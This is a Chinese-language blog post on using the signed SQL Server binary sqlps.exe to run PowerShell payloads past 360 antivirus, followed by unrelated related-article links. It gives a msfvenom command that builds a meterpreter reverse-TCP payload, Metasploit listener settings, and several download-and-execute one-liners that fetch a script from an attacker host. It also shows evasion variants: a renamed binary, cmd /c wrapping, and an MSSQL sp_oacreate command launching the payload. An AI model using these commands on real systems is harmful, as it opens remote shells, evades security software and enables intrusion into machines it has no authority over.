sqlps.exe白名单的利用(过S60!)

简介: sqlps.exe白名单的利用(过S60!)

0x01 sqlps.exe简介

sqlps.exe是SQL Server附带的一个具有Microsoft签名的二进制文件,用于加载SQL Server cmdlet,Microsoft Visual C#开发,可用ILSpy反编译查看源代码。


Microsoft SQL Server\100和110是Powershell v2,120和130是Powershell v4。2016中已由SQLToolsPS.exe替换,但出于兼容性原因将包含在安装中。

    C:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
    C:\Program Files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe
    C:\Program Files (x86)\Microsoft SQL Server\120\Tools\Binn\sqlps.exe
    C:\Program Files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
    C:\Program Files (x86)\Microsoft SQL Server\140\Tools\Binn\sqlps.exe
    C:\Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\sqlps.exe


    0x02 MSF监听并执行

    使用sqlps.exe执行360.ps1后会结束掉当前这个cmd.exe命令提示符,可能要延迟几秒MSF才接收到会话信息。

      msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=443 -f psh-reflection > /var/www/html/360.ps1
      msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
      msf5 exploit(multi/handler) > set lhost 192.168.1.120
      msf5 exploit(multi/handler) > set lport 443
      msf5 exploit(multi/handler) > exploit


      sqlps执行上线:

        SQLPS -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120/360.ps1'))"


        0x03 绕过360防护执行

        众所周知360和火绒对powershell.exe进程的调用监控的非常严, sqlps.exe也有可能已经被360拦截了,如下图。


        已被拦截:

          powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120/360.ps1'))"
          SQLPS -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120/360.ps1'))"
          declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:/windows/system32/cmd.exe'


          但我们还是可以尝试使用加壳、反编译或者重命名和cmd /c等方式来绕过sqlps.exe的执行

          绕过方式:

            SQLPS1 -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120/360.ps1'))"
            cmd /c SQLPS -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.120/360.ps1'))"
            declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'C:\ProgramData\SQLPS.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''http://192.168.1.120/360.ps1''))"'


            0x04 注意事项

            实战中建议根据目标主机实际环境提取相对应版本的sqlps.exe,如单独提取出来的sqlps.exe在执行时可能会出现缺少依赖项等问题,常见的有以下两种报错。

            已测试的系统和sqlps.exe见下表,测试记录见下图。


            0x05 参考链接

            https://mp.weixin.qq.com/s/XkleeVDz80WZy4NZqXhEfA

            https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/

            相关文章
            |
            SQL 监控 druid
            Druid未授权访问 漏洞复现
            Druid未授权访问 漏洞复现
            22022 1
            |
            存储 安全 网络协议
            绕过WAF和多个防护软件提权案例
            绕过WAF和多个防护软件提权案例
            608 0
            |
            10月前
            |
            存储 JSON 安全
            会话跟踪方案
            Cookie是浏览器端存储的小型数据文件,用于保存用户状态、登录信息等,但存在不安全、不可跨域等问题。Session将数据存于服务器端,通过SessionID识别用户,更安全。Token(如JWT)是一种自包含、可验证的身份凭证,广泛用于前后端分离和移动端认证,支持分布式系统,安全性高,灵活性强。
            238 4
            会话跟踪方案
            |
            10月前
            |
            云安全 弹性计算 安全
            高危预警:用友 U8 Cloud 漏洞成勒索攻击新入口
            近期,用友U8 Cloud多个高危漏洞遭 exploited,导致阿里云客户遭遇勒索攻击。涉及反序列化、远程命令执行及文件上传漏洞,影响2.0至5.1全系列版本。攻击者可任意执行代码、加密数据勒索。建议立即修补、备份并启用安全防护措施。
            |
            机器学习/深度学习 分布式计算 供应链
            阿里云先知安全沙龙(上海站) ——大模型基础设施安全攻防
            大模型基础设施的安全攻防体系涵盖恶意输入防御和基础设施安全,包括框架、三方库、插件、平台、模型和系统安全。关键漏洞如CVE-2023-6019(Ray框架命令注入)、CVE-2024-5480(PyTorch分布式RPC)及llama.cpp中的多个漏洞,强调了代码安全性的重要性。模型文件安全方面,需防范pickle反序列化等风险,建议使用Safetensors格式。相关实践包括构建供应链漏洞库、智能化漏洞分析和深度检测,确保全方位防护。
            |
            存储 Cloud Native 块存储
            EBS深度解析:云原生时代企业级块存储
            企业上云的策略,从 Cloud-Hosting 转向 Serverless 架构。块存储作为企业应用上云的核心存储产品,将通过 Serverless 化来加速新的计算范式全面落地。在本话题中,我们将会介绍阿里云块存储企业级能力的创新,深入解析背后的技术细节,分享对未来趋势的判断。
            1231 3
            |
            监控 安全 网络安全
            IT 知识百科:什么是暴力破解?
            本文深入解析了“暴力破解”这一信息技术领域的常见话题,涵盖其原理、应用及防范措施。文章首先介绍了暴力破解的基本概念,即通过穷举所有可能的字符组合来尝试获取信息或密码。接着,探讨了暴力破解在密码破解、系统入侵和数据库攻击中的应用。最后,提出了包括使用强密码、限制登录尝试次数、多因素认证、定期更新密码、加强系统安全防护及监控预警在内的六项防范措施,旨在帮助用户有效抵御暴力破解攻击,保障信息安全。
            1109 3
            |
            XML 安全 API
            .NET 9 AOT的突破 - 支持老旧Win7与XP环境
            .NET 9开始,AOT支持Win7和XP,不仅仅只支持SP1版本
            .NET 9 AOT的突破 - 支持老旧Win7与XP环境
            |
            物联网 C# Windows
            看看如何使用 C# 代码让 MQTT 进行完美通信
            看看如何使用 C# 代码让 MQTT 进行完美通信
            2654 0
            |
            存储 SpringCloudAlibaba 安全
            Nacos未授权访问复现及修复
            Nacos未授权访问复现及修复
            5046 1